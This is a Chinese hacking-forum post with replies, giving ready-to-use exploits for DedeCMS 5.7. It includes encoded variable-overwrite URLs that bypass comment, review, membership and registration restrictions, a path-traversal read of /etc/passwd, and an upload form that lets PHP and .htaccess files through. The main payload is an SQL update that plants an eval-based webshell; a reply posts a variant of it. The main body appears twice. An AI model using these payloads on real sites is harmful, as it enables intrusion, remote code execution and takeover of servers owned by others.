我来说说最新这个dedecms getshell 不成功的原因吧
如题直接给代码
data/config.cache.inc.phpinclude/common.inc.php写个主要是看到很多人唧唧歪歪 的说什么不行 骗子什么的 不懂表乱说 多看几行代码!
多说一句 只对dede5.7 有效 dede5.6 因为官方重新封装了chr 函数
但是 在调用这个chr 函数的时候没有成功 会爆路径
虽然自己在很早前也发现了这个漏洞 但是 既然漏洞已经公布 我也马后炮一下吧 自己当成写了几个exp 但是没有前一位基友写的好
$cfg_mb_addontype = 'swf|mpg|mp3|rm|rmvb|wmv|wma|wav|mid|mov|zip|rar|doc|xsl|ppt|wps';
覆盖 $cfg_mb_addontype 的上传漏洞还记得我上次发的 feedback.php 文件 2次注入么? 虽然我当初没有绕过60个字节 但是还有xss 嘛
但是很多基友说 评论关闭了 不允许游客 发表 很鸡肋 ---------- 真的很鸡肋么
系统已经禁止评论功能!
&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=95&arrs1[]=102&arrs1[]=111&arrs1[]=114&arrs1[]=98&arrs1[]=105&arrs1[]=100&arrs2[]=99
绕过游客禁止评论
&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=95&arrs1[]=103&arrs1[]=117&arrs1[]=101&arrs1[]=115&arrs1[]=116&arrs2[]=99
还有要审核后才能看 办法总是有的
过审核:
feedback.php?aid=609&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=99&arrs1[]=104&arrs1[]=101&arrs1[]=99&arrs1[]=107&arrs2[]=99
上次有基友发布了一个dede 包含漏洞
又很多人说关闭了会员很鸡肋
我就不说 绕过会员关闭
/plus/carbuyaction.php?dopost=return&code=../../../../../../../../../etc/passwd%00&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=109&arrs1[]=98&arrs1[]=95&arrs1[]=111&arrs1[]=112&arrs1[]=101&arrs1[]=110&arrs1[]=99&_REQUEST[code]=alipay
再来一发 会员开启 禁止注册绕过
member/index_do.php?fmdo=user&dopost=regnew&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=109&arrs1[]=98&arrs1[]=95&arrs1[]=97&arrs1[]=108&arrs1[]=108&arrs1[]=111,&arrs1[]=119&arrs1[]=114&arrs1[]=101&arrs1[]=103&arrs2[]=99
汗珍藏了快一年的0day 就这样消失了
给最新getshell exp
这个是 imspider 给出的方法 很赞 是update 的方法 有点缺陷 听说有大牛找了insert 的方法 想要的自己去找吧
http://localhost/uploads/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=34&arrs2[]=98&arrs2[]=102&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=34&arrs2[]=44&arrs2[]=32&arrs2[]=92&arrs2[]=39&arrs2[]=97&arrs2[]=92&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=92&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=64&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=98&arrs2[]=102&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=92&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=34&arrs2[]=79&arrs2[]=75&arrs2[]=34&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=35
http://localhost/uploads/plus/mytag_js.php?aid=1
看源代码 如果返回 ok 就表示 成功
http://localhost/uploads/plus/bf.php 密码 bf
找后台? 又这个必要么???????????
data/config.cache.inc.php
$cfg_mysql_type = 'mysql';
//引入数据库类
if ($GLOBALS['cfg_mysql_type'] == 'mysqli' && function_exists("mysqli_init")) //如果配置的是 mysql 或者 mysqli_init() 支持这个函数 都是可以成功的
{
require_once(DEDEINC.'/dedesqli.class.php');
} else {
require_once(DEDEINC.'/dedesql.class.php'); //漏洞文件出在这里 具体不分析了
}
多说一句 只对dede5.7 有效 dede5.6 因为官方重新封装了chr 函数
但是 在调用这个chr 函数的时候没有成功 会爆路径
虽然自己在很早前也发现了这个漏洞 但是 既然漏洞已经公布 我也马后炮一下吧 自己当成写了几个exp 但是没有前一位基友写的好
$cfg_mb_addontype = 'swf|mpg|mp3|rm|rmvb|wmv|wma|wav|mid|mov|zip|rar|doc|xsl|ppt|wps';
覆盖 $cfg_mb_addontype 的上传漏洞
<form name="form1" action="http://loalhost/member/uploads_add.php?arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=109&arrs1[]=98&arrs1[]=95&arrs1[]=97&arrs1[]=100&arrs1[]=100&arrs1[]=111&arrs1[]=110&arrs1[]=116&arrs1[]=121&arrs1[]=112&arrs1[]=101&arrs2[]=124&arrs2[]=46&arrs2[]=104&arrs2[]=116&arrs2[]=97&arrs2[]=99&arrs2[]=99&arrs2[]=101&arrs2[]=115&arrs2[]=115&arrs2[]=13&arrs2[]=10&arrs2[]=124&arrs2[]=97&arrs2[]=115&arrs2[]=97&arrs2[]=124&arrs2[]=99&arrs2[]=100&arrs2[]=120&arrs2[]=124&arrs2[]=99&arrs2[]=101&arrs2[]=114&arrs2[]=124&arrs2[]=97&arrs2[]=115&arrs2[]=104&arrs2[]=120&arrs2[]=124&arrs2[]=112&arrs2[]=104&arrs2[]=116&arrs2[]=109&arrs2[]=108&arrs2[]=124&arrs2[]=80&arrs2[]=32&arrs2[]=104&arrs2[]=112&arrs2[]=124&arrs2[]=80&arrs2[]=32&arrs2[]=72&arrs2[]=80&arrs2[]=124&arrs2[]=80&arrs2[]=104&arrs2[]=112&arrs2[]=124&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=124" method="post" enctype="multipart/form-data" >
<input type="hidden" name="mediatype" value="4" />
<input type="hidden" name="dopost" value="save" />
<input name="addonfile" type="file" id="addonfile" />
<button class="button2" type="submit" >提交</button><br>
1,必须登陆用户。<br>
2,将待上传PHP文件扩展名改为“P hp”。即可上传Php<br>
3,其他|.htaccess |asa|cdx|cer|ashx|phtml直接上传<br>
</form>
但是很多基友说 评论关闭了 不允许游客 发表 很鸡肋 ---------- 真的很鸡肋么
系统已经禁止评论功能!
&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=95&arrs1[]=102&arrs1[]=111&arrs1[]=114&arrs1[]=98&arrs1[]=105&arrs1[]=100&arrs2[]=99
绕过游客禁止评论
&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=95&arrs1[]=103&arrs1[]=117&arrs1[]=101&arrs1[]=115&arrs1[]=116&arrs2[]=99
还有要审核后才能看 办法总是有的
过审核:
feedback.php?aid=609&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=99&arrs1[]=104&arrs1[]=101&arrs1[]=99&arrs1[]=107&arrs2[]=99
上次有基友发布了一个dede 包含漏洞
又很多人说关闭了会员很鸡肋
我就不说 绕过会员关闭
/plus/carbuyaction.php?dopost=return&code=../../../../../../../../../etc/passwd%00&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=109&arrs1[]=98&arrs1[]=95&arrs1[]=111&arrs1[]=112&arrs1[]=101&arrs1[]=110&arrs1[]=99&_REQUEST[code]=alipay
再来一发 会员开启 禁止注册绕过
member/index_do.php?fmdo=user&dopost=regnew&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=109&arrs1[]=98&arrs1[]=95&arrs1[]=97&arrs1[]=108&arrs1[]=108&arrs1[]=111,&arrs1[]=119&arrs1[]=114&arrs1[]=101&arrs1[]=103&arrs2[]=99
汗珍藏了快一年的0day 就这样消失了
给最新getshell exp
这个是 imspider 给出的方法 很赞 是update 的方法 有点缺陷 听说有大牛找了insert 的方法 想要的自己去找吧
http://localhost/uploads/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=34&arrs2[]=98&arrs2[]=102&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=34&arrs2[]=44&arrs2[]=32&arrs2[]=92&arrs2[]=39&arrs2[]=97&arrs2[]=92&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=92&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=64&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=98&arrs2[]=102&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=92&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=34&arrs2[]=79&arrs2[]=75&arrs2[]=34&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=35
http://localhost/uploads/plus/mytag_js.php?aid=1
看源代码 如果返回 ok 就表示 成功
http://localhost/uploads/plus/bf.php 密码 bf
找后台? 又这个必要么???????????
评论71次
dede从来没让人省过心。。
表示你们很强悍的说
分析的好。
内容很多啊!
这个给力~
技术交流坛子,不是用来炫耀的,
表示绕过注册测试了十几个 都没成功
顶帖不发经验不发感想的最无耻了- -~ 另 感谢楼主分享
rosi网站反应太tm快了 我表示还是木有能力搞定 ╮(╯▽╰)╭
我擦 冰封大牛啊,那必须捧场。。
好谢基友 我试试ing
学xi了,谢谢分享
可以啊 mytag` SET `normbody` = '{dede:php}file_put_contents(''../data/bf.php'',''<?php eval($_POST[bf]);?>'');{/dede:php}' WHERE `aid` =1# 编码下 &arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=98&arrs2[]=102&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=98&arrs2[]=102&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=35
这个能改改生产目录么?生产在data下吧 球指导
小弟也来了t00ls 等会发你们玩玩
不会把?那么高的几率
很多都手动阉割了- -
uploads/plus这个目录的dede找了大概50多个都没有
按道理是随便执行什么sql命令了 但是测试一直没成功
敢问你是写data 目录下 mytag-1.html 的么 我发现 data 目录一般都有写权限